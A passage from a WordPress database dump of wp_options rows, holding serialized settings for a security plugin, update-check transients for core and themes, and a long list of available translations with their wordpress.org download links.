enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:1:\"1\";s:29:\"aiowps_enable_comment_captcha\";s:1:\"1\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(136547,'auto_update_core_dev','enabled','yes'),(136548,'auto_update_core_minor','enabled','yes'),(136549,'auto_update_core_major','enabled','yes'),(136550,'user_count','1','no'),(238944,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1675174765;s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:0:{}}','no'),(242656,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:65:\"https://downloads.wordpress.org/release/en_GB/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_GB\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:65:\"https://downloads.wordpress.org/release/en_GB/wordpress-6.1.1.zip\";s:10:\"no_content\";s:0:\"\";s:11:\"new_bundled\";s:0:\"\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1675174765;s:15:\"version_checked\";s:5:\"6.1.1\";s:12:\"translations\";a:0:{}}','no'),(280558,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1675181270','no'),(280559,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(285760,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675174766;s:7:\"checked\";a:5:{s:14:\"twentynineteen\";s:3:\"2.1\";s:12:\"twentytwenty\";s:3:\"1.8\";s:15:\"twentytwentyone\";s:3:\"1.4\";s:17:\"twentytwentythree\";s:3:\"1.0\";s:4:\"vega\";s:5:\"3.0.0\";}s:8:\"response\";a:3:{s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"2.4\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.4.zip\";s:8:\"requires\";s:5:\"4.9.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:12:\"twentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.2.1.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.7.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:2:{s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.0\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.0.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:4:\"vega\";a:6:{s:5:\"theme\";s:4:\"vega\";s:11:\"new_version\";s:5:\"3.0.0\";s:3:\"url\";s:34:\"https://wordpress.org/themes/vega/\";s:7:\"package\";s:52:\"https://downloads.wordpress.org/theme/vega.3.0.0.zip\";s:8:\"requires\";s:3:\"4.1\";s:12:\"requires_php\";b:0;}}s:12:\"translations\";a:0:{}}','no'),(285796,'_site_transient_timeout_theme_roots','1675181801','no'),(285797,'_site_transient_theme_roots','a:5:{s:14:\"twentynineteen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:4:\"vega\";s:7:\"/themes\";}','no'),(285961,'_site_transient_timeout_available_translations','1675214838','no'),(285962,'_site_transient_available_translations','a:130:{s:2:\"af\";a:8:{s:8:\"language\";s:2:\"af\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-05-13 15:59:22\";s:12:\"english_name\";s:9:\"Afrikaans\";s:11:\"native_name\";s:9:\"Afrikaans\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/af.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"af\";i:2;s:3:\"afr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Gaan voort\";}}s:2:\"am\";a:8:{s:8:\"language\";s:2:\"am\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-09-29 20:43:49\";s:12:\"english_name\";s:7:\"Amharic\";s:11:\"native_name\";s:12:\"አማርኛ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.0.3/am.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"am\";i:2;s:3:\"amh\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"ቀጥል\";}}s:3:\"arg\";a:8:{s:8:\"language\";s:3:\"arg\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-09-22 16:46:56\";s:12:\"english_name\";s:9:\"Aragonese\";s:11:\"native_name\";s:9:\"Aragonés\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1.1/arg.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"an\";i:2;s:3:\"arg\";i:3;s:3:\"arg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continar\";}}s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-04 13:58:35\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:3:\"ary\";a:8:{s:8:\"language\";s:3:\"ary\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2017-01-26 15:42:35\";s:12:\"english_name\";s:15:\"Moroccan Arabic\";s:11:\"native_name\";s:31:\"العربية المغربية\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.21/ary.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:3;s:3:\"ary\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"as\";a:8:{s:8:\"language\";s:2:\"as\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-26 12:58:55\";s:12:\"english_name\";s:8:\"Assamese\";s:11:\"native_name\";s:21:\"অসমীয়া\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/as.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"as\";i:2;s:3:\"asm\";i:3;s:3:\"asm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-06 00:09:27\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:3:\"azb\";a:8:{s:8:\"language\";s:3:\"azb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-12 20:34:31\";s:12:\"english_name\";s:17:\"South Azerbaijani\";s:11:\"native_name\";s:29:\"گؤنئی آذربایجان\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/azb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:3;s:3:\"azb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:3:\"bel\";a:8:{s:8:\"language\";s:3:\"bel\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2019-10-29 07:54:22\";s:12:\"english_name\";s:10:\"Belarusian\";s:11:\"native_name\";s:29:\"Беларуская мова\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.9.22/bel.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"be\";i:2;s:3:\"bel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Працягнуць\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-16 13:00:35\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Напред\";}}s:5:\"bn_BD\";a:8:{s:8:\"language\";s:5:\"bn_BD\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-10-31 08:48:37\";s:12:\"english_name\";s:20:\"Bengali (Bangladesh)\";s:11:\"native_name\";s:15:\"বাংলা\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.12/bn_BD.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"bn\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:23:\"এগিয়ে চল.\";}}s:2:\"bo\";a:8:{s:8:\"language\";s:2:\"bo\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2020-10-30 03:24:38\";s:12:\"english_name\";s:7:\"Tibetan\";s:11:\"native_name\";s:21:\"བོད་ཡིག\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/bo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bo\";i:2;s:3:\"tib\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:33:\"མུ་མཐུད་དུ།\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-24 12:03:10\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-13 14:46:37\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:3:\"ceb\";a:8:{s:8:\"language\";s:3:\"ceb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-02 17:25:51\";s:12:\"english_name\";s:7:\"Cebuano\";s:11:\"native_name\";s:7:\"Cebuano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ceb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"ceb\";i:3;s:3:\"ceb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Padayun\";}}s:5:\"cs_CZ\";a:8:{s:8:\"language\";s:5:\"cs_CZ\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-25 20:56:45\";s:12:\"english_name\";s:5:\"Czech\";s:11:\"native_name\";s:9:\"Čeština\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/cs_CZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cs\";i:2;s:3:\"ces\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Pokračovat\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-14 15:48:08\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-10 08:19:28\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsæt\";}}s:14:\"de_CH_informal\";a:8:{s:8:\"language\";s:14:\"de_CH_informal\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-16 12:27:34\";s:12:\"english_name\";s:30:\"German (Switzerland, Informal)\";s:11:\"native_name\";s:21:\"Deutsch (Schweiz, Du)\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/translation/core/6.1.1/de_CH_informal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-16 12:27:22\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-17 17:06:48\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_AT\";a:8:{s:8:\"language\";s:5:\"de_AT\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-03-17 12:58:14\";s:12:\"english_name\";s:16:\"German (Austria)\";s:11:\"native_name\";s:21:\"Deutsch (Österreich)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/de_AT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-17 17:02:15\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/6.1.1/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:3:\"dsb\";a:8:{s:8:\"language\";s:3:\"dsb\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-07-16 12:13:09\";s:12:\"english_name\";s:13:\"Lower Sorbian\";s:11:\"native_name\";s:16:\"Dolnoserbšćina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1.1/dsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"dsb\";i:3;s:3:\"dsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Dalej\";}}s:3:\"dzo\";a:8:{s:8:\"language\";s:3:\"dzo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-06-29 08:59:03\";s:12:\"english_name\";s:8:\"Dzongkha\";s:11:\"native_name\";s:18:\"རྫོང་ཁ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/dzo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"dz\";i:2;s:3:\"dzo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-23 11:08:40\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-31 12:11:44\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_NZ\";a:8:{s:8:\"language\";s:5:\"en_NZ\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-04-01 22:35:34\";s:12:\"english_name\";s:21:\"English (New Zealand)\";s:11:\"native_name\";s:21:\"English (New Zealand)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/en_NZ.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-10 21:58:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-16 06:36:35\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_ZA\";a:8:{s:8:\"language\";s:5:\"en_ZA\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2021-12-24 12:36:39\";s:12:\"english_name\";s:22:\"English (South Africa)\";s:11:\"native_name\";s:22:\"English (South Africa)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/en_ZA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-18 21:56:09\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_CR\";a:8:{s:8:\"language\";s:5:\"es_CR\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-03 15:35:12\";s:12:\"english_name\";s:20:\"Spanish (Costa Rica)\";s:11:\"native_name\";s:22:\"Español de Costa Rica\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/es_CR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CO\";a:8:{s:8:\"language\";s:5:\"es_CO\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-07-22 14:08:10\";s:12:\"english_name\";s:18:\"Spanish (Colombia)\";s:11:\"native_name\";s:20:\"Español de Colombia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/es_CO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_EC\";a:8:{s:8:\"language\";s:5:\"es_EC\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-11 23:25:26\";s:12:\"english_name\";s:17:\"Spanish (Ecuador)\";s:11:\"native_name\";s:19:\"Español de Ecuador\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/es_EC.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-10 18:26:21\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/es_ES.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-10 19:19:07\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/es_MX.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-10-04 20:53:18\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8.6/es_PE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_DO\";a:8:{s:8:\"language\";s:5:\"es_DO\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-10-08 14:32:50\";s:12:\"english_name\";s:28:\"Spanish (Dominican Republic)\";s:11:\"native_name\";s:33:\"Español de República Dominicana\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8.6/es_DO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-06-14 16:02:22\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/es_CL.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_UY\";a:8:{s:8:\"language\";s:5:\"es_UY\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-31 18:33:26\";s:12:\"english_name\";s:17:\"Spanish (Uruguay)\";s:11:\"native_name\";s:19:\"Español de 